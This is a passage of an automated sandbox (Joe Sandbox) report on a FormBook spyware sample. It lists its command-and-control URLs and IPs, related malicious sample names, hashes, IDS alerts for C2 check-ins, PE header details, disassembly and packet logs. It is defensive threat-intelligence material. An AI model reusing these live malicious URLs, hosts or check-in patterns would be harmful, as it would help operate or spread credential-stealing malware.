                                              http://www.rjscorp.org/cei6/?2z=PtRhXbM&PJ9L=wjh3rahD5O8YyXDPiPgI2jcIa9PhSWViTP6mKxO94t21NngHPpPWFw/W8Bs1fVklZglLQeYSd7bpiR31wlDzTqFVQD+LW583mR1Tetwe2kyAmXAyEFXhKtTdwvrG/oT0lA==true
                                                		unknown
                                                http://www.rjscorp.org/cei6/true
                                                  		unknown
                                                  http://www.comedy.finance/mwd0/?PJ9L=zsNMsRGwEFvVUID2nvwzyJklFTuhYiH3MBMxsvplKOF6Mot/KgyF89prR2KXiWv2/O5FSCYG4KxKtJQmoSRR8B5YKwFVkQBt4uWwdNPaISGNJHiwitW0fGlJLbvQSjZk/A==&2z=PtRhXbMtrue
                                                    		unknown
                                                    http://www.mudanya-nakliyat.xyz/tkqd/true
                                                      		unknown
                                                      http://www.nakama2-sshl.xyz/bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8+FRFKzirlrJKz42G/aqidm6CRQYg/EPrqYrXSvoqI47MOsphbaLGnzH8fia9Q2y/K0qDU8XdfqR00415ssDP2dWw==&2z=PtRhXbMtrue
                                                        		unknown
                                                        http://www.mudanya-nakliyat.xyz/tkqd/?PJ9L=gK3QMDONvn1ERFi3le5iq9CigfqrIypj3GmKmlk3fya6bSQAZ6Mmquf2H7jJBtRUywZhV3/ctEceSqN2mfA4IjI7ZNYjXHB3esnYbISz5Gf8jiahD8UpXyLU85TiP8RgbQ==&2z=PtRhXbMtrue
                                                          		unknown
                                                          http://www.jophy.life/umni/true
                                                            		unknown
                                                            http://www.085bet.xyz/nn3h/?PJ9L=0X/3r3PU8xeQ+UpzBpepRVcIT4+X7S/8fyuzw9u5zzT5DQpczFdmzE38B+SQag3b+0hUKu1k9LV6hnarOtmdXHDrfjsm00b18tkifTWDLiTHQlouOXMCIVM1BtqJliAH1Q==&2z=PtRhXbMtrue
                                                              		unknown
                                                              http://www.jophy.life/umni/?2z=PtRhXbM&PJ9L=JmqTC62v8P7mi6uPhLDAp9iaIjXSB8PwqG0a5mqRptE5j7gES97YNZljt2Ht2eKQTLeZ3UNIpnjTdZAH1rWC29igZO3jlkfdeSpr3eIJWfELnBNobLhFHVBS/RUmS3PasQ==true
                                                                		unknown
                                                                http://www.comedy.finance/mwd0/true
                                                                  		unknown
                                                                  http://www.wdeb18.top/vy4k/?PJ9L=d32l86geEWYHZjxTvbwjbSU9LAKscW6mTUIXWgcYKnqJcO8pcs3M8TeLmvZmGSd++zsCnZUgxj5ZgSRZm5GNnST7Zdxi7nq5Mi/W1p3900gY77wjz5lHrGRPWDQkbfDtqg==&2z=PtRhXbMtrue
                                                                    		unknown
                                                                    http://www.trapkitten.website/ucuo/?PJ9L=F2idnr0OHvaqOr51MpBBHVyFl1qtLQKAl/KaTPRWCGeZjFeJnhqhzch+KjyhoQK5CvQXQgMRpx/N5s0yRowiXacxk2STcCVUR6hfHsh5g/iR2diS6k4PTHt/uTzg7spZGA==&2z=PtRhXbMtrue
                                                                      		unknown

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://duckduckgo.com/chrome_newtabgrpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://duckduckgo.com/ac/?q=grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icogrpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://nakama2-sshl.xyz/bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8grpconv.exe, 00000003.00000002.3877214220.000000000545A000.00000004.10000000.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876836526.000000000359A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.mudanya-nakliyat.xyzooaSzUjoYqoTW.exe, 00000005.00000002.3878220025.00000000051A1000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://ac.ecosia.org/autocomplete?q=grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgrpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            162.0.238.246
                                                                            		www.jophy.lifeCanada
                                                                            		22612NAMECHEAP-NETUStrue
                                                                            13.248.169.48
                                                                            		www.comedy.financeUnited States
                                                                            		16509AMAZON-02UStrue
                                                                            45.194.36.12
                                                                            		cluster580fc23f.abcty2.comSeychelles
                                                                            		328608Africa-on-Cloud-ASZAtrue
                                                                            206.119.82.147
                                                                            		wdeb18.topUnited States
                                                                            		174COGENT-174UStrue
                                                                            183.181.83.131
                                                                            		www.nakama2-sshl.xyzJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                            195.161.68.8
                                                                            		www.trapkitten.websiteRussian Federation
                                                                            		8342RTCOMM-ASRUtrue
                                                                            3.33.130.190
                                                                            		rjscorp.orgUnited States
                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                            85.159.66.93
                                                                            		natroredirect.natrocdn.comTurkey
                                                                            		34619CIZGITRtrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1530780
                                                                            Start date and time:2024-10-10 14:37:26 +02:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 40s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed:6
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:lByv6mqTCJ.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:cc3dc16efe58123d394b8e068b5a8410a971d156ff4de13795a31e257cd83e15.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@5/1@11/8
                                                                            EGA Information:
                                                                            • Successful, ratio: 66.7%
                                                                            HCA Information:
                                                                            • Successful, ratio: 88%
                                                                            • Number of executed functions: 16
                                                                            • Number of non-executed functions: 327
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • VT rate limit hit for: lByv6mqTCJ.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            08:39:01API Interceptor7450672x Sleep call for process: grpconv.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            162.0.238.246Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                            • www.kilbmn.xyz/a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl
                                                                            DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                            • www.buyiop.online/r6mm/
                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.huyven.xyz/dbbh/
                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                            • www.mistsui.top/r48b/
                                                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • www.quantis.life/hczh/
                                                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.inchey.online/ercr/
                                                                            13.248.169.483wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                            • www.invicta.world/0cd8/
                                                                            RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                            • www.invicta.world/0cd8/
                                                                            ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                            • www.catholic.today/1u6c/
                                                                            PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                            • www.catholic.today/gs9g/
                                                                            lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                            • www.comedy.finance/e21k/
                                                                            sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                            • www.firstcry.shop/e4x0/
                                                                            8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                            • www.firstcry.shop/2mvq/
                                                                            BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.jacquesjanine.online/ey4t/
                                                                            fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dyme.tech/h7lb/
                                                                            jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dyme.tech/h7lb/
                                                                            45.194.36.12http://9bet938.com/Get hashmaliciousUnknownBrowse
                                                                              http://9bet938.com/Get hashmaliciousUnknownBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.trapkitten.websiteL7mZZNG72D.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.161.68.8
                                                                                www.nakama2-sshl.xyz3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                PO098765678.exeGet hashmaliciousFormBookBrowse
                                                                                • 183.181.83.131
                                                                                www.comedy.financelWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                COGENT-174US3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                • 38.47.232.196
                                                                                EqszHzzNn5.exeGet hashmaliciousFormBookBrowse
                                                                                • 38.47.207.146
                                                                                foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                • 38.47.233.65
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 38.151.83.159
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 149.86.134.165
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.60.249.66
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.60.249.66
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.60.249.66
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.139.235.128
                                                                                PAYMENT ADVISE#9879058.exeGet hashmaliciousFormBookBrowse
                                                                                • 154.23.184.240
                                                                                AMAZON-02USfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 52.222.236.23
                                                                                3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                • 52.217.171.225
                                                                                nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.252.114
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 52.222.236.80
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 52.222.236.48
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 52.222.236.23
                                                                                J5kZynz7Ju.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                                                • 52.219.84.114
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 52.222.236.48
                                                                                foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                • 54.67.42.145
                                                                                NAMECHEAP-NETUS3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.213.249.216
                                                                                Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.213.249.216
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 162.0.234.190
                                                                                RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.213.249.216
                                                                                https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                                • 198.54.115.219
                                                                                https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                                • 198.54.115.219
                                                                                https://email.mail.dlce.cc/c/eJxMkLGu2zAMAL_G2mRQNC1Kg4Yu-Y2AIqVGqGMbiVEgf18E6PDWwy13cp73YSVRDhYW8CxonpTJZ4rdQ9UYrUIyTM5KFJUUXSuBMVHOKaF7FCSt2iWzJIldM2sUaYtGUuMY1I2CgBQAckhrQJwXaMl6YrPQE1OYCJ4yttk2bbOq28rjus73tPya8Dbh7T-f8NarqGnFgFVrXXABZlsl59aBFNjtxzX6ULnGsX_LslFvHbJfexZPvaGXwOwRgXo1Ya7szk0-7fXVrcUaU1g8AKknhOqTZvWAUcHSWiOxe5Wx92MiqPI55fWnj_dj7L9nPZ7u3Xa7X-P541Fwfwv-CwAA__-Ag2laGet hashmaliciousUnknownBrowse
                                                                                • 198.54.115.219
                                                                                bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.238.238
                                                                                zmhPgbED7M.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.192.19.19
                                                                                kNyZqDECXJ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 198.54.122.135
                                                                                Africa-on-Cloud-ASZA3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                                • 45.197.45.172
                                                                                Hys3ySfAxL.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.228.204.25
                                                                                X309qRfJAl.elfGet hashmaliciousMiraiBrowse
                                                                                • 45.196.17.135
                                                                                nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.228.204.29
                                                                                nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.246.50.105
                                                                                xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.240.63.154
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.228.63.19
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.228.141.215
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.228.38.14
                                                                                https://rebrand.ly/8dgyuabGet hashmaliciousUnknownBrowse
                                                                                • 156.228.173.54

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Temp\13612MI5K

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\grpconv.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.991477745197249
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                File name:lByv6mqTCJ.exe
                                                                                File size:283'136 bytes
                                                                                MD5:031c70730800588a7b8228f4ab79595e
                                                                                SHA1:34f6426df964d75f6c148b0bfc572c33bd2cd798
                                                                                SHA256:cc3dc16efe58123d394b8e068b5a8410a971d156ff4de13795a31e257cd83e15
                                                                                SHA512:4a10c45223c6d1c5a56ccaf15919e35393cedaa3cdd4d9f2a50b7a0adbcb873194470e977f8e33d02e14173de6ff4a7030d5f2a592889f84487cd194209cf03e
                                                                                SSDEEP:6144:drnArpjXGIQR3SaCU8Q4ZXsxVgGiTsTwwy2tpBPkOszhCwKK8:dEVvaCURCXFGi47eOuk
                                                                                TLSH:645412AA601B1341FA131F7451FE692A5CB41BF2B3B99310C99EF82DE37D0496319B4E
                                                                                File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L...PW.X.................N...................`....@................

                                                                                File Icon

                                                                                Icon Hash:00928e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4014a0
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x58145750 [Sat Oct 29 08:01:20 2016 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 000003A0h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                push 00000390h
                                                                                lea eax, dword ptr [ebp-0000039Ch]
                                                                                push 00000000h
                                                                                push eax
                                                                                mov dword ptr [ebp-000003A0h], 00000000h
                                                                                call 00007F04DD0395ACh
                                                                                add esp, 0Ch
                                                                                mov edi, 00006425h
                                                                                xor esi, esi
                                                                                mov dword ptr [ebp-0Ch], 00001FBAh
                                                                                mov dword ptr [ebp-04h], 000062CDh
                                                                                mov dword ptr [ebp-08h], 00002D11h
                                                                                call 00007F04DD039878h
                                                                                mov dword ptr [ebp-2Ch], eax
                                                                                mov ecx, 0000300Fh
                                                                                mov edx, 00000029h
                                                                                mov eax, 000000C2h
                                                                                nop
                                                                                cmp eax, 29h
                                                                                cmovnle eax, edx
                                                                                dec ecx
                                                                                jne 00007F04DD037D19h
                                                                                lea eax, dword ptr [ebp-0000034Ch]
                                                                                push eax
                                                                                push 00007C07h
                                                                                call 00007F04DD037A3Bh
                                                                                lea eax, dword ptr [ebp-000000A0h]
                                                                                push eax
                                                                                push 00000C73h
                                                                                call 00007F04DD037A2Ah
                                                                                lea eax, dword ptr [ebp-000000A0h]
                                                                                push 04E25BF0h
                                                                                push eax
                                                                                call 00007F04DD038229h
                                                                                lea eax, dword ptr [ebp-000000A0h]
                                                                                push eax
                                                                                lea eax, dword ptr [ebp-0000034Ch]
                                                                                push 00000009h
                                                                                push eax
                                                                                call 00007F04DD039584h
                                                                                lea eax, dword ptr [ebp-0000034Ch]
                                                                                push eax
                                                                                lea eax, dword ptr [ebp-68h]
                                                                                push eax
                                                                                call 00007F04DD039494h
                                                                                lea eax, dword ptr [ebp-68h]
                                                                                push eax
                                                                                call 00007F04DD038D1Bh

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [C++] VS2012 build 50727
                                                                                • [ASM] VS2012 build 50727
                                                                                • [LNK] VS2012 build 50727

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x44c440x44e0006f14a87dc2380d565fdc5606662f8e8False0.9894580875680581data7.995417785217454IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-10T14:38:14.159611+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55000485.159.66.9380TCP
                                                                                2024-10-10T14:38:45.296817+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549770206.119.82.14780TCP
                                                                                2024-10-10T14:39:08.912810+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549914162.0.238.24680TCP
                                                                                2024-10-10T14:39:23.029135+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549983183.181.83.13180TCP
                                                                                2024-10-10T14:39:36.222740+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998813.248.169.4880TCP
                                                                                2024-10-10T14:40:11.420465+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549992195.161.68.880TCP
                                                                                2024-10-10T14:40:33.346653+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999645.194.36.1280TCP
                                                                                2024-10-10T14:40:46.748670+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5500003.33.130.19080TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 10, 2024 14:38:44.387403011 CEST4977080192.168.2.5206.119.82.147
                                                                                Oct 10, 2024 14:38:44.392383099 CEST8049770206.119.82.147192.168.2.5
                                                                                Oct 10, 2024 14:38:44.392514944 CEST4977080192.168.2.5206.119.82.147
                                                                                Oct 10, 2024 14:38:44.399358988 CEST4977080192.168.2.5206.119.82.147
                                                                                Oct 10, 2024 14:38:44.404273987 CEST8049770206.119.82.147192.168.2.5
                                                                                Oct 10, 2024 14:38:45.296657085 CEST8049770206.119.82.147192.168.2.5
                                                                                Oct 10, 2024 14:38:45.296730042 CEST8049770206.119.82.147192.168.2.5
                                                                                Oct 10, 2024 14:38:45.296817064 CEST4977080192.168.2.5206.119.82.147
                                                                                Oct 10, 2024 14:38:45.299485922 CEST4977080192.168.2.5206.119.82.147
                                                                                Oct 10, 2024 14:38:45.304521084 CEST8049770206.119.82.147192.168.2.5
                                                                                Oct 10, 2024 14:39:00.639107943 CEST4986580192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:00.644069910 CEST8049865162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:00.644165993 CEST4986580192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:00.658725023 CEST4986580192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:00.663605928 CEST8049865162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:01.257863998 CEST8049865162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:01.257904053 CEST8049865162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:01.258426905 CEST4986580192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:02.175510883 CEST4986580192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:03.193975925 CEST4988180192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:03.201479912 CEST8049881162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:03.202626944 CEST4988180192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:03.212733030 CEST4988180192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:03.217530012 CEST8049881162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:03.821419001 CEST8049881162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:03.822438955 CEST8049881162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:03.822489977 CEST4988180192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:04.721853971 CEST4988180192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:05.741322994 CEST4989680192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:05.746340036 CEST8049896162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:05.746453047 CEST4989680192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:05.763079882 CEST4989680192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:05.768297911 CEST8049896162.0.238.246192.168.2.5
